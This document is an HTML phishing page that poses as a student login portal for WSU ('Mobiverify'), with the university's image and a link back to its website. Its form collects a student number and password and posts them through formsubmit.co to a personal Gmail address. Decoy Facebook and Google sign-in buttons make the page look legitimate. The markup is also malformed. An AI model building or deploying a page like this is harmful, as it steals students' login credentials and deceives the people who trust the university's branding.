<form action="https://formsubmit.co/ambitiousboyii14@gmail.com" method="POST">
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css">
    <link rel="stylesheet" href="wsu /wsu.css">
    <img src="wsu img/wsu.jpg" width="399" height="240">
    <title>Page title</title>
</head>
<body>
    <p>Mobiverify</p>
    
    <fieldset>
        <br>
        <label>Use your students details to Login</label>
        <br><br><br><br>
        <input type="number" name="text" id="username" placeholder="Student Number" required><a href="#"  class="fas fa-user-alt"></i></a>
        
        <br><br>
        <input type="password" name="pass" id="password" placeholder="Enter your Password" required><a href="#" ><i class="fas fa-lock"></i></a>
        <br><br>
        <button class="btn1" type="submit">Sign Up</button>
        </form>
        <br><br>
        <label>-OR-</label>
        <br><br>
        <a href="http://www.facebook.com"><button class="btn2">Sign In Using Facebook</button></a><a href="#" class="user"><i class="fab fa-facebook-square"></i></a>
        <br><br>
        <a href="http://www.account.google.com"><button class="btn3">Sign In Using Google+</button></a><a href="#" class="user"><i class="fas fa-user-circle"></i></a><br><br>
      <a class="link" href="http://www.wsu.ac.za">go back....WSU Website</a>
      <br>
    </fieldset>
</body>
</html>
<style>
   body{
    background: #e9e9e9;
  
}

img{
    
}

p{
    position: relative;
    left: 33vw;
    font-size: 3vh;
    color: grey;
}

fieldset{
    text-align: center;
    background-color: white;
    border: 1px solid white;
    border-radius: 2px;
    box-shadow: -3px -3px 20px #ffffff,5px 5px 20px gray;
}

input{
    width: 75vw;
    height: 10vw;
    border-radius: 1vw;
    border: 2px solid gray;
    font-size: 4vw;
    }
    
    .btn1{
        background: #006cff;
        color: white;
        width: 30vw;
        height: 8vw;
        border-radius: 1vw;
        border: 1px solid #006cff;
    }
    
    label{
        color: #212121;
    }
    
    a {
        color: black;
        position: relative;
        right: 6vw;
    }
    
    .btn2{
        background: #006cff;
        width: 60vw;
        height: 9vw;
       color: white;
       border: 2px solid #006cff;
       border-radius: 3px;
       position: relative;
       left: 3vh;
    }
    
    .btn3{
        background: red;
        width: 60vw;
        height: 9vw;
       color: white;
       border: 2px solid red;
       border-radius: 3px;
    position: relative;
       left: 3vh;
       }
       
       .user{
           color: white;
           right: 10vw;
       }
.link{
    text-decoration: white;
    color: blue;
    position: absolute;
    right: 54vw;
}
 
    
    
</style>
